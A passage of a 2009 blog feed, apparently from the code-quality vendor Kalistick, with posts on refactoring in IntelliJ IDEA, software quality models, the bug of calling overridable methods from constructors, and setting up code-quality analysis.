externalize to do an &lt;em&gt;Extract Method&lt;/em&gt;. If IntellijIDEA detects that this refactoring is not possible, it prompts for &lt;em&gt;Replace Method with Method Object&lt;/em&gt; refactoring: &lt;/p&gt; &lt;img style="margin: 0px auto 10px; display: block; text-align: center;" src="http://www.kalistick.fr/blog/res/2009/05/Idea-ExtractMethod.png" alt="'Extract Method' function with IntellijIDEA" border="0" width="512" height="512" /&gt;  &lt;p&gt; This refactoring can be configured via the GUI: &lt;/p&gt; &lt;img style="margin: 0px auto 10px; display: block; text-align: center;" src="http://www.kalistick.fr/blog/res/2009/05/Idea-ExtractMethodObject.png" alt="'Extract Method Object' function with IntellijIDEA" border="0" width="441" height="493" /&gt;  &lt;p&gt; IntellijIDEA is currently the only IDE to support this type of refactoring. The others only have &lt;em&gt;Extract Method&lt;/em&gt; (Eclipse or Netbeans for Java, Visual Studio &lt;a href="http://www.jetbrains.com/resharper"&gt;ReSharper&lt;/a&gt; or &lt;a href="http://www.devexpress.com/Products/Visual_Studio_Add-in/Refactoring/"&gt;Refactor! Pro&lt;/a&gt; plugins for C#). &lt;/p&gt;  &lt;p&gt; The advantages of automatic refactoring are obviously its speed and the lack of regression-related risk (thus the importance of choosing the right development tools for optimizing productivity). Here, the developer's only job is to &lt;strong&gt;identify&lt;/strong&gt; blocks of instructions to externalize and then &lt;strong&gt;naming&lt;/strong&gt; them. We can then review the most complex methods in a project and simplify them one by one (if possible, documenting them and associating unit tests to them). &lt;/p&gt;  &lt;h2&gt;Conclusion&lt;/h2&gt; &lt;p&gt; As always, it is best to avoid &lt;strong&gt;upstream&lt;/strong&gt; problems, especially when it comes to having to make corrections. Developers should be careful to write only unitary methods. Knowing how to split up a method comes with experience, and extracting methods then becomes natural. But don't overlook the increased productivity that is available with modern IDEs, particularly in their &lt;strong&gt;refactoring&lt;/strong&gt; functions. &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-8087031267496841690?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/8087031267496841690/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/05/simplify-your-code.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8087031267496841690?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8087031267496841690?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/D62-Jl9vlww/simplify-your-code.html" title="Simplify your code" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/05/simplify-your-code.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEMBR3szcSp7ImA9WxNSGEw.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-1749536864999638135</id><published>2009-03-23T10:45:00.000+01:00</published><updated>2009-09-01T16:47:36.589+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-01T16:47:36.589+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="theory" /><title>What is quality software?</title><content type="html">&lt;p&gt;&lt;strong&gt;What is quality software?&lt;/strong&gt; The answer will largely depend on the role of the person you ask. A user will focus on their needs, while someone in charge of maintenance will prefer code that is reliable, readable, and understandable. Some will be happy with a quantitative definition (ex. the number of bugs per 1000 instructions), while others prefer a more qualitative definition (how well it satisfies user needs, the successfulness of the product, etc.). &lt;/p&gt; &lt;p&gt;For more than 30 years, countless researchers have worked to find models that effectively and objectively quantify software quality.&lt;/p&gt;  &lt;p&gt;Several models have been noteworthy, including the following:&lt;/p&gt;  &lt;p&gt;&lt;strong&gt;The McCall Model (1977):&lt;/strong&gt; McCall's "Quality Triangle" is one of the first published models for quality. Three high-level "perspectives" group together eleven factors of quality that can be measured based on a set of properties. One of the criticisms against this model is the subjectivity of some properties.&lt;/p&gt;  &lt;div style="text-align: center;"&gt; &lt;img src="http://www.kalistick.fr/blog/res/2009/02/mccall.png" alt="" /&gt; &lt;/div&gt; &lt;p&gt;&lt;strong&gt;The Boehm Model (1978):&lt;/strong&gt; Boehm and his team were inspired by the McCall model (a three-level hierarchical model), and they expanded the list of measurable quality factors.&lt;/p&gt;  &lt;a href="http://en.wikipedia.org/wiki/Barry_Boehm"&gt;http://en.wikipedia.org/wiki/Barry_Boehm&lt;/a&gt;
&lt;a href="http://sunset.usc.edu/Research_Group/barry.html"&gt;http://sunset.usc.edu/Research_Group/barry.html&lt;/a&gt;  &lt;p&gt;&lt;strong&gt;ISO 9126 (1991):&lt;/strong&gt; The International Organization for Standardization's ISO 9126 was inspired by these models to define a standard quality model and establish recommendations for measuring its characteristics. &lt;/p&gt; &lt;p&gt; &lt;a href="http://en.wikipedia.org/wiki/ISO_9126"&gt;http://en.wikipedia.org/wiki/ISO_9126&lt;/a&gt;
&lt;/p&gt;  &lt;p&gt;However, despite the degree of theoretical maturity, it was difficult to put these models into practice. Software providers are fully aware of the impact of implementing code quality control on the reliability and maintainability of software. However, code quality remains an untapped source of improvements, as opposed to process quality or project management (CMMI, ISO certifications).&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt; A study (2) conducted on nearly 200 software providers highlighted the reasons that discouraged them from establishing development quality procedures. The main reasons mentioned are:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Setup and monitoring time&lt;/li&gt;&lt;li&gt;The initial cost&lt;/li&gt;&lt;li&gt;Lack of support from quality management&lt;/li&gt;&lt;/ul&gt; &lt;p&gt; The research and development we have conducted with the INSA Lyon and CETIC laboratories is based on the above research, yet it provides specific responses to these problems. Some of the findings from this research are available in a &lt;a href="http://liesp.insa-lyon.fr/v2/?q=fr/node/100406"&gt;scientific publication&lt;/a&gt;, published by ICSSEA (International Conference on Software &amp;amp; Systems Engineering and their Applications) in 2008.&lt;/p&gt;   &lt;p&gt; &lt;em&gt;(1) McCall, J. A., Richards, P. K., and Walters, G. F., "Factors in Software Quality", Nat'l Tech. Information Service, no. Vol. 1, 2 and 3, 1977&lt;/em&gt; &lt;/p&gt; &lt;p&gt; &lt;em&gt;(2) J.M. Verner, T.T. Moores, A.R. Barret “Software quality: perceptions and practices in Hong Kong”, Achieving quality in software, Chapman &amp;amp; Hall, 1996, p.77-88&lt;/em&gt; &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-1749536864999638135?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/1749536864999638135/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/what-is-quality-software.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/1749536864999638135?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/1749536864999638135?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/P-TFxTQZ-lk/what-is-quality-software.html" title="What is quality software?" /><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/what-is-quality-software.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEMGRng_fip7ImA9WxNSGEw.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-4251701568136863991</id><published>2009-03-09T10:44:00.000+01:00</published><updated>2009-09-01T16:47:07.646+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-01T16:47:07.646+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="java" /><category scheme="http://www.blogger.com/atom/ns#" term="practice" /><category scheme="http://www.blogger.com/atom/ns#" term="c#" /><title>[Practice] Derivable internal method called in the constructor</title><content type="html">&lt;p&gt; &lt;em&gt;Each article in the &lt;a href="http://blog.kalistick.com/search/label/practice"&gt;Practice&lt;/a&gt; category focuses on a bad development practice detected by Kalistick's Cockpit.&lt;/em&gt; &lt;/p&gt;  &lt;p&gt;Calling a derivable internal method (not &lt;span style="font-weight: bold;font-family:courier new;" &gt;final&lt;/span&gt;&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;in Java, or &lt;span style="font-weight: bold;font-family:courier new;" &gt;virtual&lt;/span&gt;&lt;span style="font-family:courier new;"&gt; &lt;/span&gt;in C#) from the class constructor is a risky practice. If the method is overloaded, inconsistencies or even errors may arise.&lt;/p&gt;&lt;p&gt; &lt;/p&gt;The intrinsic reasons for these errors are closely related to the object instantiation processes in the C# and Java languages, particularly when executing parent constructors before initializing the fields in the child class. &lt;p&gt;Example:&lt;/p&gt;&lt;span style="font-weight: bold;font-family:courier new;" &gt;MyWindow.java&lt;/span&gt; &lt;pre name="code" class="java:nocontrols"&gt;public class MyWindow
{
public MyWindow()
{
 /* ... */
 buildUI();
}

public void buildUI()
{
 /* ... */
}
}
&lt;/pre&gt;   &lt;span style="font-weight: bold;font-family:courier new;" &gt;MyExtendedWindow.java&lt;/span&gt; &lt;pre name="code" class="java:nocontrols"&gt;public class MyExtendedWindow extends MyWindow
{
private MyComponent component;

public MyExtendedWindow()
{
 this.component = new MyComponent();
}

public void buildUI()
{
 super.buildUI();
 component.setWidth(800);
}
}
&lt;/pre&gt;   &lt;p&gt; &lt;img src="http://www.kalistick.fr/blog/images/pin.png" alt="" /&gt; The &lt;code&gt;buildUI&lt;/code&gt; method in the &lt;code&gt;MyWindow&lt;/code&gt; class is derivable and called in the constructor for the &lt;code&gt;MyWindow&lt;/code&gt; class. &lt;/p&gt;   &lt;p&gt; &lt;img src="http://www.kalistick.fr/blog/images/pin.png" alt="" /&gt; The &lt;code&gt;MyExtendedWindow&lt;/code&gt; class extends &lt;code&gt;MyWindow&lt;/code&gt; and overloads the &lt;code&gt;buildUI&lt;/code&gt; method in order to add processing to these fields. &lt;/p&gt;    &lt;p&gt;When instantiating an object in the &lt;code&gt;MyExtendedWindow&lt;/code&gt; class, the order of execution will be as follows:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;Initialize the fields in the &lt;code&gt;MyWindow&lt;/code&gt; class (declaration).&lt;/li&gt;&lt;li&gt;Execute the constructor for the &lt;code&gt;MyWindow&lt;/code&gt; class.&lt;/li&gt;&lt;li&gt;Execute the &lt;code&gt;buildUI&lt;/code&gt; method in the &lt;code&gt;MyExtendedWindow&lt;/code&gt; class (overload).&lt;/li&gt;&lt;li&gt;Initialize the fields in the &lt;code&gt;MyExtendedWindow&lt;/code&gt; class (declaration).&lt;/li&gt;&lt;li&gt;Execute the constructor for the &lt;code&gt;MyExtendedWindow&lt;/code&gt; class. &lt;/li&gt;&lt;/ol&gt; &lt;p&gt;The instantiation will result in a nullity exception (in 3) since the &lt;code&gt;setWidth&lt;/code&gt; method in &lt;code&gt;MyComponent&lt;/code&gt; is called before the &lt;code&gt;component&lt;/code&gt; object is initialized, which will be in 5. Here, the error is obvious. In other circumstances, the symptoms might not be as obvious, making the diagnostic much more time consuming!&lt;/p&gt;   &lt;p&gt; Possible corrections: &lt;/p&gt;&lt;ul&gt;&lt;li&gt;Declare the non-derivable or private &lt;code&gt;buildUI&lt;/code&gt; method at the &lt;code&gt;MyWindow&lt;/code&gt; level so that it can no longer be overloaded.&lt;/li&gt;&lt;li&gt;Remove the &lt;code&gt;buildUI&lt;/code&gt; method from the &lt;code&gt;MyWindow&lt;/code&gt; constructor and explicitly call it after the constructor.&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-4251701568136863991?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/4251701568136863991/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/practice-derivable-internal-method.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/4251701568136863991?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/4251701568136863991?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/KevEeoGBA60/practice-derivable-internal-method.html" title="[Practice] Derivable internal method called in the constructor" /><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/practice-derivable-internal-method.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQNSH0zcSp7ImA9WxNSGEw.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-1435124277000540905</id><published>2009-02-26T11:03:00.000+01:00</published><updated>2009-09-01T16:46:39.389+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-01T16:46:39.389+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cockpit" /><category scheme="http://www.blogger.com/atom/ns#" term="analysis" /><title>What elements need to be provided for an analysis?</title><content type="html">&lt;p&gt; The Cockpit analyzes projects based on &lt;a href="http://en.wikipedia.org/wiki/Static_code_analysis"&gt;statistical analysis&lt;/a&gt; techniques. To do this, a number of elements must be provided at the start of a new analysis. &lt;/p&gt; &lt;p&gt; There are three categories of elements: &lt;/p&gt; &lt;ul&gt;&lt;li&gt;Source files (*.cs and *.java)&lt;/li&gt;&lt;li&gt;Files generated from compiling (*.dll and *.jar)  &lt;/li&gt;&lt;li&gt;Libraries referenced by the project (*.dll and *.jar) &lt;/li&gt;&lt;/ul&gt; &lt;p&gt; The &lt;span class="ks_strong"&gt;source files&lt;/span&gt; are used in the analysis to calculate some metrics, such as the number of lines of code, the search for practice anomalies, and the search for duplicates. These files are also used to generate the viewable source code you can access from an anomaly in the Cockpit. &lt;/p&gt; &lt;p&gt; The &lt;span class="ks_strong"&gt;files generated&lt;/span&gt; from compiling are used to extract structural elements from the code (classes, interfaces, methods, etc.), which are used to aggregate the quality measurements. Also, other metrics (number of instructions, &lt;a href="http://en.wikipedia.org/wiki/Cyclomatic_complexity"&gt;cyclomatic complexity&lt;/a&gt;, etc) and practice anomalies will be extracted from these files. &lt;/p&gt; &lt;p&gt; Finally, the &lt;strong&gt;libraries&lt;/strong&gt; are not directly analyzed, but they are useful when researching practice anomalies. &lt;/p&gt; &lt;p&gt; Let's consider the example of &lt;i&gt;NeverMakeCtorCallOverridableMethod&lt;/i&gt;, which checks for calls to a virtual method in the constructor. For each method called in a constructor, this rule will check if it is virtual. If the method is defined in a library, the declaration must be accessible. &lt;/p&gt;
&lt;div class="push-up-info"&gt; &lt;div class="push-up-info-txt"&gt; &lt;div class="ks_strong"&gt;Why do we need both the source files and the compiled files in order to extract the same type of information?&lt;/div&gt;In short, the source files allow us to analyze at a syntactic level. Binary files, however, provide access to the structure of the code, the chain of method calls, dependencies, and the instructions (&lt;a href="http://channel8.msdn.com/Posts/MSIL-the-language-of-the-CLR-Part-1/"&gt;MSIL/CIL&lt;/a&gt; for C# or &lt;a href="http://www.ibm.com/developerworks/ibm/library/it-haggar_bytecode/"&gt;bytecode&lt;/a&gt; for Java). This combination provides us with more thorough and complementary results in the Cockpit. &lt;/div&gt; &lt;/div&gt; &lt;p&gt;Finally, for consistent results, all of the elements should be synchronous. The source files should be the ones used to generate the compiled files, and the libraries should be the same versions as used in the code. To avoid problems and facilitate processes, we provide packaging tools that interface with the standard tools (&lt;a href="http://msdn.microsoft.com/fr-fr/library/ms171452%28VS.80%29.aspx"&gt;MSBuild&lt;/a&gt;, &lt;a href="http://msdn.microsoft.com/fr-fr/teamsystem/default.aspx"&gt;Team Foundation System&lt;/a&gt;, &lt;a href="http://ant.apache.org/"&gt;Ant&lt;/a&gt;, &lt;a href="http://maven.apache.org/"&gt;Maven&lt;/a&gt;, &lt;a href="https://hudson.dev.java.net/"&gt;Hudson&lt;/a&gt;...). They will be discussed later.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-1435124277000540905?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/1435124277000540905/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/what-elements-need-to-be-provided-for.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/1435124277000540905?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/1435124277000540905?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/pLIx7Vt9gxQ/what-elements-need-to-be-provided-for.html" title="What elements need to be provided for an analysis?" /><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/what-elements-need-to-be-provided-for.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQMQ34yfSp7ImA9WxNSGEw.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-8055370467511265201</id><published>2009-02-09T11:02:00.000+01:00</published><updated>2009-09-01T16:46:22.095+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-09-01T16:46:22.095+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cockpit" /><category scheme="http://www.blogger.com/atom/ns#" term="process" /><title>[Case study] New development on an existing application.</title><content type="html">&lt;p&gt;When starting new developments on an existing application, we often set a strategy for ourselves to improve the quality as compared to what was done before.&lt;/p&gt;  &lt;p&gt;For this, we:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Carry out &lt;strong&gt;targeted corrective actions&lt;/strong&gt; on the existing code, actions that are quick to implement, whose benefits are concrete, and that will not increase the non-regression testing effort.&lt;/li&gt;&lt;li&gt;Start with &lt;strong&gt;more ambitious quality objectives&lt;/strong&gt; for the new code so that we do not reproduce existing problems and so that we do better from the start in order to avoid problems rather than correct problems. &lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;It is difficult, however, to balance these two approaches, since traditional code quality tools analyze the entire project without differentiating between existing code and new code. As a result, when applying the desired rules, the tools generate a huge volume of alerts for the existing code. They drown the team in information, making it difficult to use. Consequently, the quality objective loses steam and is eventually limited to a few rules to be applied on the new and old development.&lt;/p&gt;  &lt;p&gt;The &lt;strong&gt;Cockpit&lt;/strong&gt; allows a different approach by keeping only the existing problems we want to correct in its radar to be sure that progress is made, while holding new development to stricter requirements.&lt;/p&gt;  &lt;p&gt;This approach is quick and easy to implement in just &lt;strong&gt;4 steps&lt;/strong&gt;:&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Perform a &lt;strong&gt;quality diagnostic&lt;/strong&gt; on the application. This diagnostic provides a clear view of the situation by using an automatic analysis of the code and returning qualitative and quantitative information on the problems it finds. &lt;/li&gt;&lt;li&gt;Target the &lt;strong&gt;improvements to be made&lt;/strong&gt;. Based on the diagnostic, you must decide which problems to solve and then prioritize them to follow the project constraints. The results of analyses performed with the Cockpit show that there are mainly critical problems corresponding to bugs that have been corrected (concurrent access problems, incorrect instructions, etc.) Other problems may be structural (non-maintainable code), excessive copy/paste code left too long and needing to be correct, or even problems with a major regression risk. &lt;/li&gt;&lt;li&gt;&lt;strong&gt;Clear the quality radar of&lt;/strong&gt; problems that will not be corrected right now. With the Cockpit, quality rules can be disabled only for specific portions of code (method(s), class(es), module(s), etc.) so as to skip existing code. Reset mode also makes detected problems disappear in a given version by only considering newly detected problems. For example, it no longer detects overly complex methods that cannot be changed, but it detects all new overly complex methods. &lt;/li&gt;&lt;li&gt;&lt;strong&gt;Share this view&lt;/strong&gt; with the entire project team and monitor the implementation of the process. Make it standard usage to visit the Cockpit and dashboards to control quality throughout the project. &lt;/li&gt;&lt;/ol&gt;  &lt;p&gt;During the next iteration, we configure Cockpit to include other improvement actions, if necessary.&lt;/p&gt;  &lt;p&gt;This approach was designed to meet the needs of our customers who need to control overall project quality by distinguishing new development and improvements to existing code. For example, the approach is used for maintenance projects that are used internally or via a TPAM.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-8055370467511265201?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/8055370467511265201/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/08/case-study-new-development-on-existing.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8055370467511265201?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/8055370467511265201?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/fj5k4Ncsivs/case-study-new-development-on-existing.html" title="[Case study] New development on an existing application." /><author><name>Charles Bompay</name><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/08/case-study-new-development-on-existing.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUcHRXY7eSp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-6689759306686684078</id><published>2009-01-19T11:01:00.001+01:00</published><updated>2009-10-05T14:50:34.801+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:50:34.801+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cockpit" /><category scheme="http://www.blogger.com/atom/ns#" term="blog" /><category scheme="http://www.blogger.com/atom/ns#" term="tools" /><title>Differences with an OpenSource integration</title><content type="html">&lt;p&gt;We are sometimes asked if our solution, the &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Cockpit&lt;/a&gt;, is different from existing OpenSource tools. Our best response generally involves providing a demonstration of our tool, but the objective here is to make our arguments more specific.&lt;/p&gt;  &lt;p&gt;Everyone knows now that installing OpenSource tools eventually reveals hidden costs. There have been many &lt;em&gt;marketing&lt;/em&gt; discussions on this topic, supporting the position of proprietary tools, with a sometimes significant expression of &lt;a href="http://en.wikipedia.org/wiki/Fear,_uncertainty_and_doubt" title="Fear, Uncertainty and Doubt"&gt;FUD&lt;/a&gt;.&lt;/p&gt;  &lt;p&gt;Our platform is itself based on an infrastructure that includes OpenSource products, and we are well-positioned to know that OpenSource is an often relevant alternative. We say this simply to emphasize the complexity of implementing a quality tracking tool using currently available OpenSource products. The purpose is to show that the effort resides not only in installing the tool, but also in the additional tasks that are needed in order to make a &lt;strong&gt;true&lt;/strong&gt; quality improvement.&lt;/p&gt;  &lt;h2&gt;Selection of tools&lt;/h2&gt; &lt;p&gt;Selecting tools is obviously critical to how the remaining steps work. The supply of quality-related tools presents some particularities:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;There is an abundant amount of tools. There are several dozen tools for various languages. For example, here is a &lt;strong&gt;non-exhaustive&lt;/strong&gt; list: &lt;a href="http://www.laatuk.com/tools/review_tools.html"&gt;http://www.laatuk.com/tools/review_tools.html&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;Tools are difficult to compare. Tools that measure metrics, for example, offer their own set of metrics. And if some metrics are split between different tools, they are not always calculated the same.&lt;/li&gt;&lt;li&gt;Because quality analysis is a highly popular subject of research, there are many tools being developed by universities. These tools sometimes stop being developed once the corresponding thesis is complete or cannot be adapted to practical use on professional projects (some examples: &lt;a href="http://www.spinellis.gr/sw/ckjm/"&gt;ckjm&lt;/a&gt;, &lt;a href="http://ivs.cs.uni-magdeburg.de/sw-eng/us/CAME/CAME.tools.jmt.shtml"&gt;JMT&lt;/a&gt;, &lt;a href="http://loose.upt.ro/iplasma/index.html"&gt;iPlasma&lt;/a&gt;, etc.).&lt;/li&gt;&lt;/ul&gt;  &lt;h2&gt;Installation and integration&lt;/h2&gt; &lt;p&gt;Installing these tools presents a level of complexity that varies greatly from case to case. Installation is usually quite simple. Only &lt;a href="http://en.wikipedia.org/wiki/Mashup_%28web_application_hybrid%29"&gt;mashup&lt;/a&gt; tools, which combine different measurement types, sometimes require real work to configure or install third-party tools (see &lt;a href="http://xradar.sourceforge.net/"&gt;XRadar&lt;/a&gt;, &lt;a href="http://qalab.sourceforge.net/"&gt;QALab&lt;/a&gt;, etc.).&lt;/p&gt;  &lt;p&gt;We should note two things:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Using these tools is only effective when they are standardized, such as within a continuous integration process. The existing procedure must therefore be modified to launch these tools and to publish their results so that the entire team can see them.&lt;/li&gt;&lt;li&gt;For a full view of the quality of development, often several tools are aggregated, each providing different measurements. It is therefore difficult to get a consistent summary from these heterogeneous results. Some &lt;em&gt;mashup&lt;/em&gt; tools offer a first level response to this problem.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Finally, we have to consider how these tools are updated or how they would be used to resolve bugs or add new features or rules.&lt;/p&gt;  &lt;h2&gt;Project settings&lt;/h2&gt; &lt;p&gt;Besides the installation and configuration that is inherent to the tool, we must also configure the scope of code to be analyzed. Depending on the tool, it may work with source files and/or compiled files. We should also be able to supply the third-party libraries that are used for compiling and/or executing the code (which varies according to the tool). Finally, we should be able to exclude some of the code from the analysis: generated code, patched third-party code, test code, etc.&lt;/p&gt;  &lt;p&gt;This work should be done at the start of the process, and it continues throughout the project and requires expertise to be transmitted whenever the team changes. The ease of updating the settings should be an essential factor when selecting tools. No matter what, a development must always be well structured in order to be automatically analyzed.&lt;/p&gt;  &lt;h2&gt;Rule Settings&lt;/h2&gt; &lt;p&gt;The most critical step involves selecting the quality rules. Some tools provide several hundred rules. It is rarely worthwhile to keep all of these rules because developers will soon be annoyed by an avalanche of anomalies, so we should work with a selection. But this job is complex:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;It required true expertise concerning the technology used.&lt;/li&gt;&lt;li&gt;A result depends greatly on its implementation. Whether a bad practice, a metric, or a copy/paste, the ways they are implemented are high variable, based on the tools. We must therefore experiment with the tool before determining whether any particular rules are truly relevant for a project.&lt;/li&gt;&lt;li&gt;As for metrics, setting thresholds is always a delicate process. For example, what should we choose as the upper threshold for the &lt;a href="http://en.wikipedia.org/wiki/Cyclomatic_complexity"&gt;cyclomatic complexity&lt;/a&gt; of a Java method? And a C# method?&lt;/li&gt;&lt;li&gt;This selection work will likely stir up debates within the team over discussed practices, thresholds thought to be too demanding, etc. It should therefore be handled by someone who knows the subject perfectly.&lt;/li&gt;&lt;li&gt;Existing code is particularly difficult to deal with. How do we ensure the quality of development problems without making code unstable that has already passed functional testing? This issue is discussed in &lt;a href="http://blog.kalistick.com/2009/08/case-study-new-development-on-existing.html"&gt;another entry&lt;/a&gt;. &lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;In all cases, the chosen rules must be ranked according to their priority or severity in order to make processing easier.&lt;/p&gt;  &lt;h2&gt;Training and building awareness&lt;/h2&gt; &lt;p&gt;In order to correct problems and be able to avoid repeating them, developing should be trained on the chosen quality rules. There are two possible strategies:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Review the rules upstream in the project via an oral presentation or an exhaustive recommendation guide.&lt;/li&gt;&lt;li&gt;Let the developers learn about the quality rules by consulting the analysis results. The developers should then have easy access to the documentation for each rule, ideally with examples and links. The true objective is not just to correct problems, but to expand expertise so as to not repeat problems, thus having a truly continuous improvement process.&lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;In practice, we find that the first solution is not very effective because the developers only retain some of the rules they are shown. Our customers' experience shows that the second solution seems to be more effective, combined with a general presentation upstream to show some structural rules that will be applied with the early developments.&lt;/p&gt;  &lt;h2&gt;Correction plan&lt;/h2&gt; &lt;p&gt;Detection of violations of quality rules is the first step, but the objective is to correct these anomalies. This aspect is neglected by most tools, even though it is fundamental for quality monitoring to be effective and for the team to be able to measure the application of the quality rules.&lt;/p&gt;  &lt;p&gt;A correction plan might involve an allotment of points to be corrected: by priority, by developer, by type, etc. Why not handle these corrections like tasks to be completed, like in a bug tracking tool? This allows for better integration of the correction process in the schedule and tracking corrections that have been made.&lt;/p&gt;  &lt;h2&gt;Conclusion&lt;/h2&gt; &lt;p&gt;Implementing a quality monitoring process using OpenSource tools is a real alternative, but be sure to thoroughly compare the items needed in order to get &lt;strong&gt;effective&lt;/strong&gt; results. Besides showing that the project has this or that process, the objective is to achieve a tangible return on investment.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-6689759306686684078?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/6689759306686684078/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/01/differences-with-opensource-integration.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/6689759306686684078?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/6689759306686684078?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/QAu_jPHycCE/differences-with-opensource-integration.html" title="Differences with an 